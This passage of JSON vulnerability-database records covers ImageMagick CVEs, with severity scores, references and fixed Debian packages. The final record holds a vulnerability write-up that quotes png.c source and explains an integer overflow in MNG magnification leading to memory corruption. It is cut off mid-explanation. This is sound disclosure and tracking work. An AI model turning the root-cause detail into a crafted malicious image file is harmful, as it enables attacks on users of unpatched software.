}, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/332c1566acc2de77857032d3c2504ead6210ff50" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/55c344f4b514213642da41194bab57b4476fb9f5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/55c344f4b514213642da41194bab57b4476fb9f5" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p33r-fqw2-rqmm", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:07:57Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p33r-fqw2-rqmm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25795", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25795" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442099", "reference_id": "2442099", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442099" }, { "reference_url": "https://github.com/advisories/GHSA-p33r-fqw2-rqmm", "reference_id": "GHSA-p33r-fqw2-rqmm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p33r-fqw2-rqmm" }, { "reference_url": "https://usn.ubuntu.com/8127-1/", "reference_id": "USN-8127-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8127-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25795", "GHSA-p33r-fqw2-rqmm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dtza-65ku-aber" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/70175?format=api", "vulnerability_id": "VCID-e3ne-1hd5-dyfg", "summary": "ImageMagick: Incorrect Handling of Image Depth in MIFF Processing in ImageMagick", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-43965.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-43965.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-43965", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45403", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45324", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45414", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45415", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45466", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45462", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45411", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45423", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45367", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45422", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00226", "scoring_system": "epss", "scoring_elements": "0.45444", "published_at": "2026-04-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-43965" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-43965", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-43965" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2361876", "reference_id": "2361876", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2361876" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/bac413a26073923d3ffb258adaab07fb3fe8fdc9", "reference_id": "bac413a26073923d3ffb258adaab07fb3fe8fdc9", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T15:03:28Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/bac413a26073923d3ffb258adaab07fb3fe8fdc9" }, { "reference_url": "https://github.com/ImageMagick/Website/blob/main/ChangeLog.md#711-44---2025-02-22", "reference_id": "ChangeLog.md#711-44---2025-02-22", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T15:03:28Z/" } ], "url": "https://github.com/ImageMagick/Website/blob/main/ChangeLog.md#711-44---2025-02-22" }, { "reference_url": "https://usn.ubuntu.com/8007-1/", "reference_id": "USN-8007-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8007-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-43965" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e3ne-1hd5-dyfg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80562?format=api", "vulnerability_id": "VCID-eb4u-x1mt-2uan", "summary": "ImageMagick: Division by zero in sRGBTransformImage() in MagickCore/colorspace.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20311.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20311.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20311", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31719", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31849", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31893", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31712", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31764", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31794", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31798", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31757", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31722", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31753", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31731", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31699", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31528", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20311" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946739", "reference_id": "1946739", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946739" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2021-20311" ], "risk_score": 2.4, "exploitability": "0.5", "weighted_severity": "4.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eb4u-x1mt-2uan" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/351745?format=api", "vulnerability_id": "VCID-eeju-vhdm-aqbe", "summary": "ImageMagick: Magick.NET: ImageMagick: Denial of Service via integer truncation in viff encoder", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33900.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33900.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33900", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04973", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04936", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.12508", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13313", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33900" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33900", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33900" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:29:30Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/d27b840a61b322419a66d0d192ff56d52498148d", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:29:30Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d27b840a61b322419a66d0d192ff56d52498148d" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:29:30Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458020", "reference_id": "2458020", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458020" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33900", "reference_id": "CVE-2026-33900", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33900" }, { "reference_url": "https://github.com/advisories/GHSA-v67w-737x-v2c9", "reference_id": "GHSA-v67w-737x-v2c9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v67w-737x-v2c9" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v67w-737x-v2c9", "reference_id": "GHSA-v67w-737x-v2c9", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:29:30Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v67w-737x-v2c9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068084?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1" } ], "aliases": [ "CVE-2026-33900", "GHSA-v67w-737x-v2c9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eeju-vhdm-aqbe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/27523?format=api", "vulnerability_id": "VCID-ef36-52cx-dfg5", "summary": "imagemagick: integer overflows in MNG magnification\n## **Vulnerability Details**\n\nThe magnified size calculations in `ReadOneMNGIMage` (in `coders/png.c`) are unsafe and can overflow, leading to memory corruption.\n\nThe source snippet below is heavily abbreviated due to the size of the function, but hopefully the important points are captured.\n\n```c\nstatic Image *ReadOneMNGImage(MngReadInfo* mng_info,\n const ImageInfo *image_info,ExceptionInfo *exception)\n{\n\n// Lots of stuff, this is effectively a state machine for the MNG rendering commands,\n// skip to the point where we start processing the \"MAGN\" command.\n\n if (memcmp(type,mng_MAGN,4) == 0)\n {\n png_uint_16\n magn_first,\n magn_last,\n magn_mb,\n magn_ml,\n magn_mr,\n magn_mt,\n magn_mx,\n magn_my,\n magn_methx,\n magn_methy;\n\n// Details unimportant, but each of the `magn_xxx` variables is read from the file.\n\n if (magn_first == 0 || magn_last == 0)\n {\n /* Save the magnification factors for object 0 */\n mng_info->magn_mb=magn_mb;\n mng_info->magn_ml=magn_ml;\n mng_info->magn_mr=magn_mr;\n mng_info->magn_mt=magn_mt;\n mng_info->magn_mx=magn_mx;\n mng_info->magn_my=magn_my;\n mng_info->magn_methx=magn_methx;\n mng_info->magn_methy=magn_methy;\n }\n }\n\n// Details unimportant, we load the image to be scaled and store it in `image`\n\n if (mng_type)\n {\n MngBox\n crop_box;\n\n if (((mng_info->magn_methx > 0) && (mng_info->magn_methx <= 5)) &&\n ((mng_info->magn_methy > 0) && (mng_info->magn_methy <= 5)))\n {\n png_uint_32\n magnified_height,\n magnified_width;\n\n if (logging != MagickFalse)\n (void) LogMagickEvent(CoderEvent,GetMagickModule(),\n \" Processing MNG MAGN chunk\");\n\n if (image->columns == 1)\n mng_info->magn_methx = 1;\n if (image->rows == 1)\n mng_info->magn_methy = 1;\n if (mng_info->magn_methx == 1)\n {\n magnified_width=mng_info->magn_ml; // [0]\n \n if (image->columns > 1)\n magnified_width += mng_info->magn_mr; // [1]\n\n if (image->columns > 2)\n magnified_width += (png_uint_32)\n ((image->columns-2)*(mng_info->magn_mx)); // [2]\n }\n\n// Different cases handle available scaling kinds, all of which have similar issues...\n\n// We now check whether the output image is larger than the input image in either\n// dimension, and if so, we will allocate a new image buffer of size\n// `magnified_width * magnified_height`.\n\n if (magnified_height > image->rows ||\n magnified_width > image->columns)\n {\n Image\n *large_image;\n\n// Snip...\n\n large_image->columns=magnified_width;\n large_image->rows=magnified_height;\n\n magn_methx=mng_info->magn_methx;\n magn_methy=mng_info->magn_methy;\n\n// In between here, we allocate the pixel buffer for `large_image`.\n\n /* magnify the rows into the right side of the large image */\n\n if (logging != MagickFalse)\n (void) LogMagickEvent(CoderEvent,GetMagickModule(),\n \" Magnify the rows to %.20g\",\n (double) large_image->rows);\n m=(ssize_t) mng_info->magn_mt;\n yy=0;\n length=(size_t) GetPixelChannels(image)*image->columns;\n next=(Quantum *) AcquireQuantumMemory(length,sizeof(*next));\n prev=(Quantum *) AcquireQuantumMemory(length,sizeof(*prev));\n\n if ((prev == (Quantum *) NULL) ||\n (next == (Quantum *) NULL))\n {\n if (prev != (Quantum *) NULL)\n prev=(Quantum *) RelinquishMagickMemory(prev);\n if (next != (Quantum *) NULL)\n next=(Quantum *) RelinquishMagickMemory(next);\n image=DestroyImageList(image);\n ThrowReaderException(ResourceLimitError,\n \"MemoryAllocationFailed\");\n }\n\n n=GetAuthenticPixels(image,0,0,image->columns,1,exception);\n (void) memcpy(next,n,length);\n\n for (y=0; y < (ssize_t) image->rows; y++)\n {\n if (y == 0)\n m=(ssize_t) mng_info->magn_mt;\n\n else if (magn_methy > 1 && y == (ssize_t) image->rows-2)\n m=(ssize_t) mng_info->magn_mb;\n\n else if (magn_methy <= 1 && y == (ssize_t) image->rows-1)\n m=(ssize_t) mng_info->magn_mb;\n\n else if (magn_methy > 1 && y == (ssize_t) image->rows-1)\n m=1;\n\n else\n m=(ssize_t) mng_info->magn_my;\n\n n=prev;\n prev=next;\n next=n;\n\n if (y < (ssize_t) image->rows-1)\n {\n n=GetAuthenticPixels(image,0,y+1,image->columns,1,\n exception);\n (void) memcpy(next,n,length);\n }\n\n for (i=0; i < m; i++, yy++)\n {\n Quantum\n *pixels;\n\n assert(yy < (ssize_t) large_image->rows);\n pixels=prev;\n n=next;\n q=GetAuthenticPixels(large_image,0,yy,large_image->columns,\n 1,exception);\n if (q == (Quantum *) NULL)\n break;\n q+=(ptrdiff_t) (large_image->columns-image->columns)*\n GetPixelChannels(large_image); // [3]\n```\n\nIf we look at the calculation for `magnified_width`, we can see that we are storing the results in a `png_uint32`. The operations at \\[0\\] and \\[1\\] are safe, since `mng_info->magn_ml` and `mng_info->magn_mx` are both 16-bit unsigned integers, but both the multiplication at \\[2\\] and the addition of the result of that multiplication to `magnified_width` can overflow, leading to a value of `magnified_width` that is smaller than required.\n\nWhen we then operate on the pixel buffers, we use the original parameters for the magnification, and we assume (reasonably?) that the output buffer is larger than the input buffer when calculating where to write the upsampled/magnified pixel values. Unfortunately, after the overflow has happened, this 